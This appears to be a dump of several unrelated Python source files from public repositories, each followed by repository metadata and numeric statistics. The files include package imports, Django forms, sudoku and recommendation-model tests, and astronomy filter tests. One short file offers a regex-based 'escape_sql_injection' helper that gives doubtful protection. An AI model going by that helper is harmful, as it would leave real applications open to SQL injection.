2022-02-06T03:12:10.000Z
from .transductive_experiment import TransductiveExperiment from .multiple_run_experiment import MultipleRunExperiment from .dataset import ExperimentDataset
39.5
59
0.905063
15
158
9.333333
0.666667
0.228571
0
0
0
0
0
0
0
0
0
0
0.075949
158
3
60
52.666667
0.958904
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
6cf082254965c857b7ee0ffc75acc66c811d99bd
186
py
Python
src/babylon/schemas/__init__.py
Bl4ck4/babylon
4c3f98be799d232b78d0bd4b4aa831f19338da37
[ "MIT" ]
null
null
null
src/babylon/schemas/__init__.py
Bl4ck4/babylon
4c3f98be799d232b78d0bd4b4aa831f19338da37
[ "MIT" ]
null
null
null
src/babylon/schemas/__init__.py
Bl4ck4/babylon
4c3f98be799d232b78d0bd4b4aa831f19338da37
[ "MIT" ]
1
2021-10-02T10:28:24.000Z
2021-10-02T10:28:24.000Z
try: from .recipe import Recipe except AssertionError: pass from .measured_in import MeasuredIn from .ingredient import Ingredient from .tag import Tag from .fridge import Fridge
23.25
35
0.795699
25
186
5.88
0.52
0
0
0
0
0
0
0
0
0
0
0
0.166667
186
8
36
23.25
0.948387
0
0
0
0
0
0
0
0
0
0
0
0.125
1
0
true
0.125
0.625
0
0.625
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
1
0
1
0
0
6
9fa2171b79ac2271ddd15536e9951063c8378512
39
py
Python
machine_learning_course/common/__init__.py
arekmula/MachineLearningCourse
5966dd2ad0ee23ef8f84d218a9f64e345900402e
[ "MIT" ]
null
null
null
machine_learning_course/common/__init__.py
arekmula/MachineLearningCourse
5966dd2ad0ee23ef8f84d218a9f64e345900402e
[ "MIT" ]
null
null
null
machine_learning_course/common/__init__.py
arekmula/MachineLearningCourse
5966dd2ad0ee23ef8f84d218a9f64e345900402e
[ "MIT" ]
null
null
null
from common.utils import read_csv_file
19.5
38
0.871795
7
39
4.571429
1
0
0
0
0
0
0
0
0
0
0
0
0.102564
39
1
39
39
0.914286
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
9fbcef75adcbf8eb68953245cbe70f0ee359685e
20
py
Python
EJ.py
kimty103/dataPreprocessing
1aa4078d70076c4dc46fd389aa4b6b98a1637718
[ "MIT" ]
null
null
null
EJ.py
kimty103/dataPreprocessing
1aa4078d70076c4dc46fd389aa4b6b98a1637718
[ "MIT" ]
null
null
null
EJ.py
kimty103/dataPreprocessing
1aa4078d70076c4dc46fd389aa4b6b98a1637718
[ "MIT" ]
null
null
null
import sys print(1)
6.666667
10
0.75
4
20
3.75
1
0
0
0
0
0
0
0
0
0
0
0.058824
0.15
20
3
11
6.666667
0.823529
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.5
0
0.5
0.5
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
1
0
6
9fcdb9e3f40d27ed8ffb94172501cf3d58a48754
43
py
Python
skrl/agents/torch/trpo/__init__.py
Toni-SM/skrl
15b429d89e3b8a1828b207d88463bf7090288d18
[ "MIT" ]
43
2021-12-19T07:47:43.000Z
2022-03-31T05:24:42.000Z
skrl/agents/torch/trpo/__init__.py
Toni-SM/skrl
15b429d89e3b8a1828b207d88463bf7090288d18
[ "MIT" ]
5
2022-01-05T07:54:13.000Z
2022-03-08T21:00:39.000Z
skrl/agents/torch/trpo/__init__.py
Toni-SM/skrl
15b429d89e3b8a1828b207d88463bf7090288d18
[ "MIT" ]
1
2022-01-31T17:53:52.000Z
2022-01-31T17:53:52.000Z
from .trpo import TRPO, TRPO_DEFAULT_CONFIG
43
43
0.860465
7
43
5
0.714286
0
0
0
0
0
0
0
0
0
0
0
0.093023
43
1
43
43
0.897436
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
4c89754bb0149c421f20ef67695096e6ae91114c
42
py
Python
functions/__init__.py
vlee489/AC31009-Client
71252f38c7bf4426ff84676cad517f66c3e6cb65
[ "CC-BY-4.0" ]
null
null
null
functions/__init__.py
vlee489/AC31009-Client
71252f38c7bf4426ff84676cad517f66c3e6cb65
[ "CC-BY-4.0" ]
null
null
null
functions/__init__.py
vlee489/AC31009-Client
71252f38c7bf4426ff84676cad517f66c3e6cb65
[ "CC-BY-4.0" ]
null
null
null
from .REST import * from .windows import *
21
22
0.738095
6
42
5.166667
0.666667
0
0
0
0
0
0
0
0
0
0
0
0.166667
42
2
22
21
0.885714
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
981cee6f97ee483a4c2fa12d53754803c07eb730
6,163
py
Python
prediction_flow/pytorch/tests/test_dien.py
dydcfg/prediction-flow
332068f521bba51acc8600fe72e36e92c331bef1
[ "MIT" ]
211
2019-08-02T23:04:40.000Z
2022-03-18T06:36:25.000Z
prediction_flow/pytorch/tests/test_dien.py
dydcfg/prediction-flow
332068f521bba51acc8600fe72e36e92c331bef1
[ "MIT" ]
18
2019-08-10T07:13:05.000Z
2022-03-17T10:45:30.000Z
prediction_flow/pytorch/tests/test_dien.py
dydcfg/prediction-flow
332068f521bba51acc8600fe72e36e92c331bef1
[ "MIT" ]
51
2019-08-02T23:04:41.000Z
2021-12-24T02:48:58.000Z
from prediction_flow.features import Number, Category, Sequence, Features from prediction_flow.transformers.column import ( StandardScaler, CategoryEncoder, SequenceEncoder) from prediction_flow.pytorch import AttentionGroup, DIEN from .utils import prepare_dataloader def create_test_data(): number_features = [ Number('userAge', StandardScaler()), Number('rating', StandardScaler())] category_features = [ Category('userId', CategoryEncoder(min_cnt=1)), Category('movieId', CategoryEncoder(min_cnt=1)), Category('topGenre', CategoryEncoder(min_cnt=1))] sequence_features = [ Sequence('title', SequenceEncoder(sep='|', min_cnt=1)), Sequence('genres', SequenceEncoder(sep='|', min_cnt=1)), Sequence('clickedMovieIds', SequenceEncoder(sep='|', min_cnt=1, max_len=5)), Sequence('clickedMovieTopGenres', SequenceEncoder(sep='|', min_cnt=1, max_len=5)), Sequence('noClickedMovieIds', SequenceEncoder(sep='|', min_cnt=1, max_len=5)), Sequence('noClickedMovieTopGenres', SequenceEncoder(sep='|', min_cnt=1, max_len=5))] attention_groups = [ AttentionGroup( name='group1', pairs=[{'ad': 'movieId', 'pos_hist': 'clickedMovieIds', 'neg_hist': 'noClickedMovieIds'}, {'ad': 'topGenre', 'pos_hist': 'clickedMovieTopGenres', 'neg_hist': 'noClickedMovieTopGenres'}], hidden_layers=[8, 4])] features = Features( number_features=number_features, category_features=category_features, sequence_features=sequence_features) dataloader, _ = prepare_dataloader(features) return dataloader, features, attention_groups def test_gru_gru_att(): dataloader, features, attention_groups = create_test_data() attention_groups[0].gru_type = 'GRU' model = DIEN( features, attention_groups=attention_groups, num_classes=2, embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader))) def test_gru_att_gru(): dataloader, features, attention_groups = create_test_data() attention_groups[0].gru_type = 'AIGRU' model = DIEN( features, attention_groups=attention_groups, num_classes=2, 
embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader))) def test_gru_agru(): dataloader, features, attention_groups = create_test_data() attention_groups[0].gru_type = 'AGRU' model = DIEN( features, attention_groups=attention_groups, num_classes=2, embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader))) def test_gru_augru(): dataloader, features, attention_groups = create_test_data() attention_groups[0].gru_type = 'AUGRU' model = DIEN( features, attention_groups=attention_groups, num_classes=2, embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader))) def test_gru_augru_neg(): dataloader, features, attention_groups = create_test_data() attention_groups[0].gru_type = 'AUGRU' model = DIEN( features, attention_groups=attention_groups, use_negsampling=True, num_classes=2, embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader))) def create_test_data_with_sharing_emb(): number_features = [ Number('userAge', StandardScaler()), Number('rating', StandardScaler())] # provide word to index mapping movie_word2idx = { '__PAD__': 0, '4226': 1, '5971': 2, '6291': 3, '7153': 4, '30707': 5, '3242': 6, '42': 7, '32': 8, '34': 9, '233': 10, '291': 11, '324': 12, '325': 13, '3542': 14, '322': 15, '33': 16, '45': 17, '__UNKNOWN__': 18} movie_idx2word = { index: word for word, index in movie_word2idx.items()} category_features = [ Category('movieId', CategoryEncoder( word2idx=movie_word2idx, idx2word=movie_idx2word), embedding_name='movieId'), Category('topGenre', CategoryEncoder(min_cnt=1))] sequence_features = [ Sequence('title', SequenceEncoder(sep='|', min_cnt=1)), Sequence('genres', SequenceEncoder(sep='|', min_cnt=1)), Sequence('clickedMovieIds', SequenceEncoder( sep='|', max_len=5, word2idx=movie_word2idx, idx2word=movie_idx2word), embedding_name='movieId'), 
Sequence('noClickedMovieIds', SequenceEncoder( sep='|', max_len=5, word2idx=movie_word2idx, idx2word=movie_idx2word), embedding_name='movieId')] attention_groups = [ AttentionGroup( name='group1', pairs=[{'ad': 'movieId', 'pos_hist': 'clickedMovieIds', 'neg_hist': 'noClickedMovieIds'}], hidden_layers=[8, 4])] features = Features( number_features=number_features, category_features=category_features, sequence_features=sequence_features) dataloader, _ = prepare_dataloader(features) return dataloader, features, attention_groups def test_gru_augru_neg_with_sharing_emb(): dataloader, features, attention_groups = ( create_test_data_with_sharing_emb()) attention_groups[0].gru_type = 'AUGRU' model = DIEN( features, attention_groups=attention_groups, use_negsampling=True, num_classes=2, embedding_size=4, hidden_layers=(16, 8), final_activation='sigmoid', dropout=0.3) model(next(iter(dataloader)))
30.509901
73
0.616096
627
6,163
5.779904
0.196172
0.115894
0.088852
0.05298
0.81181
0.786976
0.775386
0.762417
0.716611
0.671358
0
0.037274
0.264319
6,163
201
74
30.661692
0.76202
0.004706
0
0.633333
0
0
0.091324
0.014351
0
0
0
0
0
1
0.053333
false
0
0.026667
0
0.093333
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
e218563c19d985ad4ad32ed850a098be4c71ce93
123
py
Python
interface/models/errors.py
Flatlooker/simple_ml
468e86792a14bc8b7d432f36bfda11e581d5c40d
[ "Unlicense" ]
null
null
null
interface/models/errors.py
Flatlooker/simple_ml
468e86792a14bc8b7d432f36bfda11e581d5c40d
[ "Unlicense" ]
null
null
null
interface/models/errors.py
Flatlooker/simple_ml
468e86792a14bc8b7d432f36bfda11e581d5c40d
[ "Unlicense" ]
null
null
null
class ModelUnknown(Exception): pass class AsyncMismatch(Exception): pass class InvalidInput(Exception): pass
13.666667
31
0.739837
12
123
7.583333
0.5
0.428571
0.395604
0
0
0
0
0
0
0
0
0
0.186992
123
8
32
15.375
0.91
0
0
0.5
0
0
0
0
0
0
0
0
0
1
0
true
0.5
0
0
0.5
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
6
e21c7642d4d9e3a1483af7b1371441ad4590cae6
146
py
Python
tdd_python_code_samples/BestPractices_Example/DependencyTest.py
masayas/-Hands-on-Test-Driven-Development-with-Python
4879e2a26327ee766da1ae3245685e5f47bdc821
[ "MIT" ]
23
2018-05-30T05:11:17.000Z
2022-02-12T20:23:25.000Z
tdd_python_code_samples/BestPractices_Example/DependencyTest.py
masayas/-Hands-on-Test-Driven-Development-with-Python
4879e2a26327ee766da1ae3245685e5f47bdc821
[ "MIT" ]
null
null
null
tdd_python_code_samples/BestPractices_Example/DependencyTest.py
masayas/-Hands-on-Test-Driven-Development-with-Python
4879e2a26327ee766da1ae3245685e5f47bdc821
[ "MIT" ]
12
2018-06-24T04:12:04.000Z
2021-11-18T09:42:00.000Z
import TestVariables def test_one(): TestVariables.test_value = 1 assert True def test_two(): assert TestVariables.test_value == 1
14.6
40
0.719178
19
146
5.315789
0.526316
0.138614
0.435644
0.455446
0
0
0
0
0
0
0
0.017241
0.205479
146
9
41
16.222222
0.853448
0
0
0
0
0
0
0
0
0
0
0
0.333333
1
0.333333
true
0
0.166667
0
0.5
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
0
0
0
0
0
6
2c3bc7bb5e241bc7902972b07f52fde7dfb822a8
2,106
py
Python
Joy_QA_Platform/frame/utils/forms.py
bzc128/Joy_QA_Platform
d3325331cd832a22e91ad895ab793577609aabc4
[ "Apache-2.0" ]
123
2019-03-01T06:07:43.000Z
2021-12-11T07:59:20.000Z
Joy_QA_Platform/frame/utils/forms.py
bzc128/Joy_QA_Platform
d3325331cd832a22e91ad895ab793577609aabc4
[ "Apache-2.0" ]
8
2019-03-06T06:33:34.000Z
2021-06-10T21:13:55.000Z
Joy_QA_Platform/frame/utils/forms.py
bzc128/Joy_QA_Platform
d3325331cd832a22e91ad895ab793577609aabc4
[ "Apache-2.0" ]
54
2019-03-01T02:25:13.000Z
2021-12-23T16:55:17.000Z
from django import forms # 验证登录表单 class LoginForm(forms.Form): account = forms.CharField(required=True, error_messages={'required': "账号不能为空"}) password = forms.CharField(required=True, error_messages={'required': "密码不能为空"}) # 验证注册表单 class RegisterForm(forms.Form): email = forms.EmailField(required=True, error_messages={'required': "邮箱不能为空", 'invalid': "邮箱格式错误"}) password = forms.CharField(required=True, min_length=6, error_messages={'required': "密码不能为空", 'min_length': "密码至少6位"}) repassword = forms.CharField(required=True, min_length=6, error_messages={'required': "密码不能为空", 'min_length': "密码至少6位"}) username = forms.CharField(required=True, max_length=20, error_messages={'required': "用户名不能为空", 'max_length': "用户名最多为20位"}) emailcapture = forms.CharField(required=True, error_messages={'required': "验证码不能为空"}) # 验证重置密码表单 class ResetForm(forms.Form): email = forms.EmailField(required=True, error_messages={'required': "邮箱不能为空", 'invalid': "邮箱格式错误"}) password = forms.CharField(required=True, min_length=6, error_messages={'required': "密码不能为空", 'min_length': "密码至少6位"}) repassword = forms.CharField(required=True, min_length=6, error_messages={'required': "密码不能为空", 'min_length': "密码至少6位"}) emailcapture = forms.CharField(required=True, error_messages={'required': "验证码不能为空"})
45.782609
84
0.460589
152
2,106
6.243421
0.25
0.139094
0.243414
0.246575
0.783983
0.775553
0.775553
0.676502
0.676502
0.537408
0
0.010076
0.434473
2,106
45
85
46.8
0.786734
0.010446
0
0.722222
0
0
0.127885
0
0
0
0
0
0
1
0
false
0.138889
0.027778
0
0.416667
0
0
0
0
null
0
1
1
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
6
2c59ee6579970269fc8253537adaf274e897f948
58
py
Python
src/tests/testModules/partialModuleVariables/TrueNegative/customTypes.py
Trimatix/carica
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
[ "Apache-2.0" ]
5
2021-09-08T07:29:23.000Z
2021-11-24T00:18:22.000Z
src/tests/testModules/partialModuleVariables/TrueNegative/customTypes.py
Trimatix/Carica
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
[ "Apache-2.0" ]
42
2021-09-08T07:31:25.000Z
2022-01-16T17:39:34.000Z
src/tests/testModules/partialModuleVariables/TrueNegative/customTypes.py
Trimatix/carica
074be16bdf50541eb3ba92ca42d0ad901cc51bd0
[ "Apache-2.0" ]
null
null
null
class MyType: pass MyType MyType() MyType == MyType()
9.666667
18
0.672414
7
58
5.571429
0.428571
0.923077
0.923077
0
0
0
0
0
0
0
0
0
0.206897
58
6
18
9.666667
0.847826
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0.2
0
0
0.2
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
0
0
0
6
2c80979a9e74cc0360696b441cc420756888a3db
31
py
Python
fhlb/__init__.py
Solaxun/FHLB
3a54902c3f7ca12d734f8bf455fdac419f345739
[ "MIT" ]
null
null
null
fhlb/__init__.py
Solaxun/FHLB
3a54902c3f7ca12d734f8bf455fdac419f345739
[ "MIT" ]
null
null
null
fhlb/__init__.py
Solaxun/FHLB
3a54902c3f7ca12d734f8bf455fdac419f345739
[ "MIT" ]
null
null
null
from fhlb.client import Client
15.5
30
0.83871
5
31
5.2
0.8
0
0
0
0
0
0
0
0
0
0
0
0.129032
31
2
30
15.5
0.962963
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
2cbc11fb4ac78e7ac2c3838cf8f1fcd552325091
84
py
Python
db/injection.py
Mhs-220/NetworkSecurityProject
20dc7fcafc4647a15670a813cbdfefa66b7cda56
[ "MIT" ]
null
null
null
db/injection.py
Mhs-220/NetworkSecurityProject
20dc7fcafc4647a15670a813cbdfefa66b7cda56
[ "MIT" ]
null
null
null
db/injection.py
Mhs-220/NetworkSecurityProject
20dc7fcafc4647a15670a813cbdfefa66b7cda56
[ "MIT" ]
null
null
null
import re def escape_sql_injection(text): return re.sub(r"(\\*)'", r"''", text)
21
41
0.619048
13
84
3.846154
0.769231
0
0
0
0
0
0
0
0
0
0
0
0.142857
84
4
41
21
0.694444
0
0
0
0
0
0.094118
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
6
2cbfe488434ade7751bef8b11777d84701d15cc4
2,207
py
Python
test_case01.py
mliezun/sudoku-solver
18b638b200be360ee6e8af0c7e612eb086924b98
[ "MIT" ]
null
null
null
test_case01.py
mliezun/sudoku-solver
18b638b200be360ee6e8af0c7e612eb086924b98
[ "MIT" ]
null
null
null
test_case01.py
mliezun/sudoku-solver
18b638b200be360ee6e8af0c7e612eb086924b98
[ "MIT" ]
null
null
null
import pytest from solver import Board, SudokuSolver def test_case01_easy(): b = Board([ [1, 0, 6, 0, 0, 2, 3, 0, 0], [0, 5, 0, 0, 0, 6, 0, 9, 1], [0, 0, 9, 5, 0, 1, 4, 6, 2], [0, 3, 7, 9, 0, 5, 0, 0, 0], [5, 8, 1, 0, 2, 7, 9, 0, 0], [0, 0, 0, 4, 0, 8, 1, 5, 7], [0, 0, 0, 2, 6, 0, 5, 4, 0], [0, 0, 4, 1, 5, 0, 6, 0, 9], [9, 0, 0, 8, 7, 4, 2, 1, 0], ]) assert repr(SudokuSolver.solve(b)) == repr([[1, 4, 6, 7, 9, 2, 3, 8, 5], [2, 5, 8, 3, 4, 6, 7, 9, 1], [3, 7, 9, 5, 8, 1, 4, 6, 2], [4, 3, 7, 9, 1, 5, 8, 2, 6], [ 5, 8, 1, 6, 2, 7, 9, 3, 4], [6, 9, 2, 4, 3, 8, 1, 5, 7], [7, 1, 3, 2, 6, 9, 5, 4, 8], [8, 2, 4, 1, 5, 3, 6, 7, 9], [9, 6, 5, 8, 7, 4, 2, 1, 3]]), "Wrong answer" def test_case01_hard(): b = Board([ [4, 0, 9, 3, 7, 0, 0, 0, 0], [1, 0, 0, 4, 2, 0, 0, 0, 0], [0, 0, 0, 0, 0, 9, 0, 1, 0], [5, 0, 0, 0, 0, 6, 0, 7, 0], [0, 6, 2, 0, 0, 0, 5, 8, 0], [0, 1, 0, 2, 0, 0, 0, 0, 3], [0, 2, 0, 8, 0, 0, 0, 0, 0], [0, 0, 0, 0, 5, 2, 0, 0, 8], [0, 0, 0, 0, 9, 7, 6, 0, 5], ]) assert repr(SudokuSolver.solve(b)) == repr([[4, 8, 9, 3, 7, 1, 2, 5, 6], [1, 5, 6, 4, 2, 8, 9, 3, 7], [2, 7, 3, 5, 6, 9, 8, 1, 4], [5, 4, 8, 9, 3, 6, 1, 7, 2], [ 3, 6, 2, 7, 1, 4, 5, 8, 9], [9, 1, 7, 2, 8, 5, 4, 6, 3], [6, 2, 5, 8, 4, 3, 7, 9, 1], [7, 9, 1, 6, 5, 2, 3, 4, 8], [8, 3, 4, 1, 9, 7, 6, 2, 5]]), "Wrong answer" def test_case01_empty(): b = Board([ [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], ]) assert repr(SudokuSolver.solve(b)) == repr([[1, 2, 3, 4, 5, 8, 9, 6, 7], [4, 5, 8, 6, 7, 9, 1, 2, 3], [9, 6, 7, 1, 2, 3, 8, 4, 5], [2, 1, 9, 8, 3, 4, 5, 7, 6], [ 3, 8, 4, 5, 6, 7, 2, 1, 9], [5, 7, 6, 9, 1, 2, 3, 8, 4], [8, 9, 1, 3, 4, 6, 7, 5, 2], [6, 3, 2, 7, 8, 5, 4, 9, 1], [7, 4, 5, 2, 9, 1, 6, 3, 8]]), "Wrong answer"
41.641509
168
0.333484
535
2,207
1.364486
0.052336
0.358904
0.452055
0.526027
0.443836
0.282192
0.227397
0.227397
0.135616
0.110959
0
0.352941
0.368373
2,207
52
169
42.442308
0.170732
0
0
0.340909
0
0
0.016312
0
0
0
0
0
0.068182
1
0.068182
false
0
0.045455
0
0.113636
0
0
0
1
null
1
1
1
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
39099f5b26a911c9bd75338a623c20b4123debfd
179
py
Python
categorical_encoding/__init__.py
isabella232/categorical_encoding
090e8d207aa14dd278e03209b4663cf9af0cad45
[ "BSD-3-Clause" ]
36
2019-08-14T22:01:24.000Z
2021-04-09T00:56:37.000Z
categorical_encoding/__init__.py
pplonski/categorical_encoding
a8ec786863cd69dabd03af440299075192fdc9b9
[ "BSD-3-Clause" ]
19
2019-08-22T19:10:10.000Z
2021-03-03T23:12:01.000Z
categorical_encoding/__init__.py
pplonski/categorical_encoding
a8ec786863cd69dabd03af440299075192fdc9b9
[ "BSD-3-Clause" ]
10
2019-09-23T19:34:42.000Z
2021-02-03T11:16:32.000Z
# flake8: noqa from .encoders import Encoder import categorical_encoding.encoders import categorical_encoding.primitives import categorical_encoding.tests __version__ = '0.4.1'
19.888889
38
0.837989
22
179
6.5
0.636364
0.356643
0.524476
0
0
0
0
0
0
0
0
0.024845
0.100559
179
8
39
22.375
0.863354
0.067039
0
0
0
0
0.030303
0
0
0
0
0
0
1
0
false
0
0.8
0
0.8
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
6
1a3778486414af97113c607aae1b449e7bff1602
255
py
Python
forks/baselines/baselines/common/__init__.py
AndrewPaulChester/sage-code
9fe676bfbcbc6f642eca29b30a1027fba2a426a0
[ "MIT" ]
null
null
null
forks/baselines/baselines/common/__init__.py
AndrewPaulChester/sage-code
9fe676bfbcbc6f642eca29b30a1027fba2a426a0
[ "MIT" ]
null
null
null
forks/baselines/baselines/common/__init__.py
AndrewPaulChester/sage-code
9fe676bfbcbc6f642eca29b30a1027fba2a426a0
[ "MIT" ]
null
null
null
# flake8: noqa F403 from forks.baselines.baselines.common.console_util import * from forks.baselines.baselines.common.dataset import Dataset from forks.baselines.baselines.common.math_util import * from forks.baselines.baselines.common.misc_util import *
42.5
60
0.839216
35
255
6.028571
0.371429
0.170616
0.341232
0.511848
0.720379
0.407583
0.407583
0
0
0
0
0.017021
0.078431
255
5
61
51
0.880851
0.066667
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
1a4914741250fd215a30dadded8acd09c42b5cca
12,407
py
Python
ifa_smeargle/testing/test_numerical_filters.py
scottwedge/IfA_Smeargle
d46a378e534020f8920a801880912aa973daec3b
[ "MIT" ]
null
null
null
ifa_smeargle/testing/test_numerical_filters.py
scottwedge/IfA_Smeargle
d46a378e534020f8920a801880912aa973daec3b
[ "MIT" ]
5
2020-06-08T22:19:37.000Z
2020-08-25T09:10:41.000Z
ifa_smeargle/testing/test_numerical_filters.py
scottwedge/IfA_Smeargle
d46a378e534020f8920a801880912aa973daec3b
[ "MIT" ]
1
2020-06-25T02:57:42.000Z
2020-06-25T02:57:42.000Z
""" This tests the filter functions to ensure that they are appropriately calculating the filters as expected. These filter tests operate on the principle that the product of single power prime integers is always unique, and by extension, so are their logarithms. Prime number arrays are filtered, multiplied together, and compared against an expected hard-coded result. """ import numpy as np import numpy.ma as np_ma import pytest import sympy as sy import math import ifa_smeargle.core as core import ifa_smeargle.masking as mask import ifa_smeargle.testing as test def test_filter_sigma_value(): """ This tests the filtering of sigma boundaries.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(10,10), index=50) # Prescribed filtering parameters # 1 Sigma sigma_multiple = 1 sigma_iterations = 2 # Create the filter. test_filter = mask.filter_sigma_value(data_array=test_array, sigma_multiple=sigma_multiple, sigma_iterations=sigma_iterations) # Create a filtered array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '92.7429789714003440708375243748487223136051046' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. 
return None def test_filter_percent_truncation(): """ This tests the filtering of percent truncations.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # Prescribed filtering parameters # The top 35% and bottom 10%. top_percent = 0.35 bottom_percent = 0.10 # Create the filter. test_filter = mask.filter_percent_truncation( data_array=test_array, top_percent=top_percent, bottom_percent=bottom_percent) # Create a filtered array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '48.3986809684295405908025212823332315778806862' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None def test_filter_pixel_truncation(): """ This tests the filtering of pixel boundaries.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # Prescribed filtering parameters # Top 13 pixels and bottom 9. top_count = 13 bottom_count = 9 # Create the filter. test_filter = mask.filter_pixel_truncation(data_array=test_array, top_count=top_count, bottom_count=bottom_count) # Create a filtered array for both convince and testing. 
test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the filter is checked. CHECK_STRING = '51.0043131557317283360473320982116998982267737' CHECK_LOGARITHM = sy.Float(CHECK_STRING) __, __, product_log10 = core.math.ifas_large_integer_array_product( integer_array=test_filtered_array.compressed()) # Finally, check. As we are dealing with large single power # prime composite numbers and long decimals, and the smallest # factor change of removing the 2 product still changes the # logarithm enough, checking if the logs are close is good # enough. assert_message = ("The check logarithm is: {check} " "The product logarithm is: {log} " "The filtered array is: \n {array}" .format(check=CHECK_LOGARITHM, log=product_log10, array=test_filtered_array)) assert math.isclose(product_log10, CHECK_LOGARITHM), assert_message # All done. return None def test_filter_maximum_value(): """ This tests the filtering of values above a maximum.""" # Creating the testing array. test_array = test.base.create_prime_test_array(shape=(7,7)) # Prescribed filtering parameters # The value 113 should not be masked. maximum_value = 113 # Create the filter. test_filter = mask.filter_maximum_value(data_array=test_array, maximum_value=maximum_value) # Create a filtered array for both convince and testing. test_filtered_array = np_ma.array(test_array, mask=test_filter, dtype=int) # A properly completed filter should have the same product value # as this number. This is how the 